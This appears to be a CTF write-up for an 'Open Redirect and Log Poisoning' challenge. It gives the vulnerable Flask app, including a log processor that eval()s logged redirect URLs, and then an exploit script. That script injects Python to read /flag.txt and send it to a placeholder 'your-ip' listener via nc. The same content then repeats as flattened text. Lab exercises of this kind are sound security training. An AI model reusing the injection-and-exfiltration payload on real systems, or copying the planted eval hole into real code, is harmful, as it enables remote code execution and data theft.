CTF File

## app.py
"""
from flask import Flask, request, redirect, url_for, send_from_directory
import logging
import os

app = Flask(__name__)

# Setup logging
logging.basicConfig(
    filename='/var/log/webapp/access.log',
    level=logging.INFO,
    format='%(asctime)s - %(message)s'
)

def is_authenticated_user():
    # This function checks if the user is authenticated
    # For simplicity, always return True
    return True

@app.route('/')
def home():
    if not is_authenticated_user():
        logging.info('Unauthorized access attempt.')
        return redirect(url_for('login'))
    
    redirect_url = request.args.get('redirect_url')
    if redirect_url:
        logging.info(f'Redirecting to: {redirect_url}')
        return redirect(redirect_url)
    
    return 'Welcome to the Vulnerable Web App! Try to find and read the flag.txt file.'

@app.route('/login')
def login():
    # Simulated login page
    return 'Login Page - User authentication goes here.'

@app.route('/static/<path:filename>')
def static_files(filename):
    return send_from_directory('/app/static', filename)

if __name__ == '__main__':
    os.makedirs('/var/log/webapp', exist_ok=True)
    app.run(host='0.0.0.0', port=5000, debug=False)
"""

# Dockerfile
"""
FROM python:3.9-slim

WORKDIR /app

COPY app.py /app/
COPY static/ /app/static/

RUN pip install flask

RUN mkdir -p /var/log/webapp && chmod 777 /var/log/webapp
RUN echo "FLAG{fake_flag}" > /flag.txt && chmod 400 /flag.txt

# Create a user to run the application
RUN useradd -m webapp
USER webapp

CMD ["python", "app.py"]
"""

# log_processor.py
"""
#!/usr/bin/env python3
import os
import time
import re

LOG_FILE = '/var/log/webapp/access.log'

def process_logs():
    print("[+] Starting log processor...")
    
    while True:
        if os.path.exists(LOG_FILE):
            with open(LOG_FILE, 'r') as f:
                logs = f.readlines()
            
            for log in logs:
                # Look for redirect URLs in logs
                redirect_match = re.search(r'Redirecting to: (.*)', log)
                if redirect_match:
                    redirect_url = redirect_match.group(1)
                    print(f"[+] Processing redirect URL: {redirect_url}")
                    
                    # THIS IS THE VULNERABLE PART
                    # It evaluates the logged redirect URL as Python code
                    try:
                        # Simulate evaluating the log content in certain contexts
                        # This is intentionally vulnerable!
                        eval(f"url = '''{redirect_url}'''")
                    except Exception as e:
                        print(f"[-] Error processing log: {e}")
            
            # Clear the log file after processing
            open(LOG_FILE, 'w').close()
        
        # Sleep for a while before checking again
        time.sleep(5)

if __name__ == "__main__":
    process_logs()
"""

# init.sh -
"""
#!/bin/bash
echo "[+] Starting CTF challenge: Open Redirect and Log Poisoning"

# Create log directory if it doesn't exist
mkdir -p /var/log/webapp
chmod 777 /var/log/webapp

# Start the log processor in the background
python /app/log_processor.py &

# Start the web application
python /app/app.py
"""

# docker-compose.yml
"""
version: '3'

services:
  webapp:
    build: .
    container_name: vuln-webapp
    ports:
      - "5000:5000"
    volumes:
      - ./logs:/var/log/webapp
    command: /app/init.sh
    restart: unless-stopped
    environment:
      - PYTHONUNBUFFERED=1

volumes:
  logs:
"""

# static/index.html
"""
<!DOCTYPE html>
<html>
<head>
    <title>Vulnerable Web App</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
        }
        h1 {
            color: #333;
        }
        .hint {
            background-color: #f5f5f5;
            padding: 10px;
            border-left: 5px solid #ccc;
        }
    </style>
</head>
<body>
    <h1>Vulnerable Web Application Challenge</h1>
    <p>This web application contains vulnerabilities that allow you to read the flag.txt file.</p>
    
    <div class="hint">
        <h3>Hint 1:</h3>
        <p>The application doesn't validate redirect URLs.</p>
        
        <h3>Hint 2:</h3>
        <p>Check how the application logs information about redirects.</p>
        
        <h3>Hint 3:</h3>
        <p>There might be something processing those logs...</p>
    </div>
</body>
</html>
"""

chmod +x init.sh

docker-compose up --build

Exploitation

Set up the Listener since we need to send the flag to our server, or we can use a webhook.

nc -lvp 8000

// exploit.py

import requests
import urllib.parse

# Target URL
target_url = "http://localhost:5000"

payload = """whyme.me
"
import os,requests
flag=open('/flag.txt').read()
requests.get('http://your-ip:8000/?flag='+flag) 
"
"""
# URL encode the payload
encoded_payload = urllib.parse.quote_plus(payload)

# Build the full exploit URL
exploit_url = f"{target_url}/?redirect_url={encoded_payload}"

# Send the request
try:
    response = requests.get(exploit_url, allow_redirects=False)
    print(f"[+] Request sent, status code: {response.status_code}")
    print(f"[+] Check Listener")
except Exception as e:
    print(f"[-] Error: {e}")

PreviousChallenge 1 NextYapping-Rant

Last updated 2 days ago

## app.py """ from flask import Flask, request, redirect, url_for, send_from_directory import logging import os app = Flask(__name__) # Setup logging logging.basicConfig( filename='/var/log/webapp/access.log', level=logging.INFO, format='%(asctime)s - %(message)s' ) def is_authenticated_user(): # This function checks if the user is authenticated # For simplicity, always return True return True @app.route('/') def home(): if not is_authenticated_user(): logging.info('Unauthorized access attempt.') return redirect(url_for('login')) redirect_url = request.args.get('redirect_url') if redirect_url: logging.info(f'Redirecting to: {redirect_url}') return redirect(redirect_url) return 'Welcome to the Vulnerable Web App! Try to find and read the flag.txt file.' @app.route('/login') def login(): # Simulated login page return 'Login Page - User authentication goes here.' @app.route('/static/<path:filename>') def static_files(filename): return send_from_directory('/app/static', filename) if __name__ == '__main__': os.makedirs('/var/log/webapp', exist_ok=True) app.run(host='0.0.0.0', port=5000, debug=False) """ # Dockerfile """ FROM python:3.9-slim WORKDIR /app COPY app.py /app/ COPY static/ /app/static/ RUN pip install flask RUN mkdir -p /var/log/webapp && chmod 777 /var/log/webapp RUN echo "FLAG{fake_flag}" > /flag.txt && chmod 400 /flag.txt # Create a user to run the application RUN useradd -m webapp USER webapp CMD ["python", "app.py"] """ # log_processor.py """ #!/usr/bin/env python3 import os import time import re LOG_FILE = '/var/log/webapp/access.log' def process_logs(): print("[+] Starting log processor...") while True: if os.path.exists(LOG_FILE): with open(LOG_FILE, 'r') as f: logs = f.readlines() for log in logs: # Look for redirect URLs in logs redirect_match = re.search(r'Redirecting to: (.*)', log) if redirect_match: redirect_url = redirect_match.group(1) print(f"[+] Processing redirect URL: {redirect_url}") # THIS IS THE VULNERABLE PART # It evaluates the logged redirect URL as Python code try: # Simulate evaluating the log content in certain contexts # This is intentionally vulnerable! eval(f"url = '''{redirect_url}'''") except Exception as e: print(f"[-] Error processing log: {e}") # Clear the log file after processing open(LOG_FILE, 'w').close() # Sleep for a while before checking again time.sleep(5) if __name__ == "__main__": process_logs() """ # init.sh - """ #!/bin/bash echo "[+] Starting CTF challenge: Open Redirect and Log Poisoning" # Create log directory if it doesn't exist mkdir -p /var/log/webapp chmod 777 /var/log/webapp # Start the log processor in the background python /app/log_processor.py & # Start the web application python /app/app.py """ # docker-compose.yml """ version: '3' services: webapp: build: . container_name: vuln-webapp ports: - "5000:5000" volumes: - ./logs:/var/log/webapp command: /app/init.sh restart: unless-stopped environment: - PYTHONUNBUFFERED=1 volumes: logs: """ # static/index.html """ <!DOCTYPE html> <html> <head> <title>Vulnerable Web App</title> <style> body { font-family: Arial, sans-serif; max-width: 800px; margin: 0 auto; padding: 20px; } h1 { color: #333; } .hint { background-color: #f5f5f5; padding: 10px; border-left: 5px solid #ccc; } </style> </head> <body> <h1>Vulnerable Web Application Challenge</h1> <p>This web application contains vulnerabilities that allow you to read the flag.txt file.</p> <div class="hint"> <h3>Hint 1:</h3> <p>The application doesn't validate redirect URLs.</p> <h3>Hint 2:</h3> <p>Check how the application logs information about redirects.</p> <h3>Hint 3:</h3> <p>There might be something processing those logs...</p> </div> </body> </html> """

// exploit.py import requests import urllib.parse # Target URL target_url = "http://localhost:5000" payload = """whyme.me " import os,requests flag=open('/flag.txt').read() requests.get('http://your-ip:8000/?flag='+flag) " """ # URL encode the payload encoded_payload = urllib.parse.quote_plus(payload) # Build the full exploit URL exploit_url = f"{target_url}/?redirect_url={encoded_payload}" # Send the request try: response = requests.get(exploit_url, allow_redirects=False) print(f"[+] Request sent, status code: {response.status_code}") print(f"[+] Check Listener") except Exception as e: print(f"[-] Error: {e}")